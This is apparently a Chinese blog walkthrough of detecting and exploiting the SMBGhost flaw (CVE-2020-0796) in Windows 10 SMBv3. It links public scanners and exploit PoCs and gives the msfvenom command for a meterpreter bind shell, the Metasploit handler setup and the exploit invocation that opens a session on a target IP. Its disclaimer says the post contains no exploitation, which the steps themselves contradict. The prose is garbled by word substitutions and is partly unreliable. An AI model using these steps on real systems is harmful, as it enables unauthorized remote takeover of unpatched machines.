0x01破绽形貌

2020年3月12日,微软正式宣布CVE-2020-0796高危破绽补丁,现在,远程行使poc代码已宣布,本文先容cve-2020-0796破绽的检测及行使,来协助人人对未修复的破绽检测和防御。破绽通告显示,SMB 3.1.1协议中处置压缩新闻时,对其中数据没有经由平安检查,直接使用会引发内存损坏破绽,可能被者行使远程执行随便代码。者行使该破绽无须权限即可实现远程代码执行,受**的目的系统只需开机在线即可能被***。

0x02 影响版本

Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows Server, Version 1903 (Server Core installation)
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows Server, Version 1909 (Server Core installation)

0x03 破绽检测

剧本检测
https://github.com/ollypwn/SMBGhost
检测返回的smb的版本,这种检测方式存在一定的误报

可以发现检测出存在该破绽
https://github.com/joaozietolie/CVE-2020-0796-Checker
行使nmap剧本检测方式检测

奇安信检测工具
http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip

0X04破绽行使

内陆提权
https://github.com/danigargu/CVE-2020-0796
内陆通俗权限用户通过exp提权后,乐成的获取了系统的system权限

远程poc行使
https://github.com/chompie1337/SMBGhost_RCE_PoC
首先下载远程行使poc

行使msf天生shellcode

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python


把buf 替换成USER_PAYLOAD

开启msf监听

use exploit/multi/handler 
set payload windows/x64/meterpreter/bind_tcp
set lport 4444
set rhost 192.168.10.183
run


运行exp
python3 exploit.py -ip 192.168.10.183

可以看到我们返回了一个meterpreter

免责声名:    
本项目仅举行信息搜集,破绽探测事情,无破绽行使、***性行为,发文初衷为仅为利便平安职员对授权项目完成测试事情和学习交流使用。       请使用者遵守当地相关执法,勿用于非授权测试,勿用于非授权测试,勿用于非授权测试(主要的事情说三遍),如作他用所蒙受的执法责任一概与东塔平安学院无关!!!